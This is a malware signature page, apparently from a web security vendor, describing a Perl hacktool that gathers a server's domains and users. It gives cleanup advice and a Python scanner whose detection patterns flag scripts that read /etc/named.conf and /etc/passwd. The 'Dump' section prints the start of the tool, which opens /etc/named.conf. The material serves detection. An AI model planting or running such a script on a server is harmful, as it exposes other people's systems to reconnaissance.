Malware Signatures

pl.hacktool.information_gathering.001

Hacktools are specially crafted tools used to perform malicious or illicit activities, such as controlling botnets, mining bitcoins, triggering Denial-of-Service attacks and brute-forcing passwords. These tools are most of the time hidden in the filesystem and were installed along with other malicious code through a vulnerability or an already compromised server.
This tool gathers sensitive information from the server. In this case, domains and users.

Affecting

Any vulnerable website with Perl support. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Cleanup is done by deleting the malicious code inside the file or replacing it with a fresh version. The infection can be found in your system by searching for suspicious eval() code inside your site's files. Also, you can sign up with us and let our team remove the malware for you.
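
One way to run the search described above, as an added example that is not part of the original signature entry: a small scanner that flags Perl scripts which open sensitive system files, using patterns taken from the dump below. The indicator names and the /etc/passwd pattern are assumptions (the dump is cut off before it shows how users are collected), and the files it scans in demo() are constructed.

```python
import os
import re
import tempfile

# Indicators from the page's dump and cleanup note; reads_passwd is an assumption.
INDICATORS = {
    "perl_shebang": re.compile(rb"\A#!\s*\S*perl\b"),
    "cgi_header": re.compile(rb"print\s*\(?\s*[\"']Content-type:", re.I),
    "reads_named_conf": re.compile(rb"open\s*\(?[^;]*/etc/named\.conf"),
    "reads_passwd": re.compile(rb"open\s*\(?[^;]*/etc/passwd"),
    "eval_call": re.compile(rb"\beval\s*[({]"),
}
SENSITIVE = {"reads_named_conf", "reads_passwd"}

def scan_file(path, max_bytes=1_000_000):
    """Return the sorted indicator names found in the first max_bytes of path."""
    try:
        with open(path, "rb") as fh:
            data = fh.read(max_bytes)
    except OSError:
        return []  # unreadable files yield no hits; review them separately
    return sorted(name for name, rx in INDICATORS.items() if rx.search(data))

def scan_tree(root):
    """Map each Perl script under root that opens a sensitive file to its hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            if "perl_shebang" in hits and SENSITIVE & set(hits):
                findings[path] = hits
    return findings

def demo():
    """Scan a constructed web root (made-up files, not real samples)."""
    samples = {
        "cgi-bin/info.pl": b"#!/usr/bin/perl\nprint \"Content-type: text/html\\n\\n\";\n"
                           b"open (d0mains, '/etc/named.conf') or $err=1;\n",
        "cgi-bin/hello.pl": b"#!/usr/bin/perl\nprint \"Content-type: text/plain\\n\\n\";\n",
        "notes.txt": b"zone files are listed in /etc/named.conf\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(body)
        return {os.path.relpath(p, root): h for p, h in scan_tree(root).items()}
```

Point scan_tree() at the site's document root; a hit is a lead for manual review, since a legitimate administration script can match the same patterns.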

Dump


#!/usr/bin/perl -I/usr/local/bandmin
print "Content-type: text/htmlnn";
print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>C0ded By web.sniper</title>
<style type="text/css">
.newStyle1 {
background-color: #000000;
font-family: "Courier New", Courier, monospace;
font-size: large;
font-weight: bold;
color: #FFFFFF;
}
.style1 {
text-align: center;
}
</style>
</head>

<body class="newStyle1">

<p class="style1"><font color="#C0C0C0"><span lang="ar-bh">[</font><font color="#FFFF00">~</font><font color="#C0C0C0">]
</font></span><font color="#C0C0C0">Server</font><font color="#FFFF00"><span lang="ar-bh">@</span></font><font color="#C0C0C0">User&#39;z
</font><font color="#FFFF00">:#<span lang="ar-bh">~</span></font></p>
<p class="style1"><font color="#FFFF00">WeB.Sniper <span lang="ar-bh">~ </span>
ll4@Hotmail.com</font></p>
';
open (d0mains, '/etc/named.conf') or $err=1;
@kr = <d0mains>;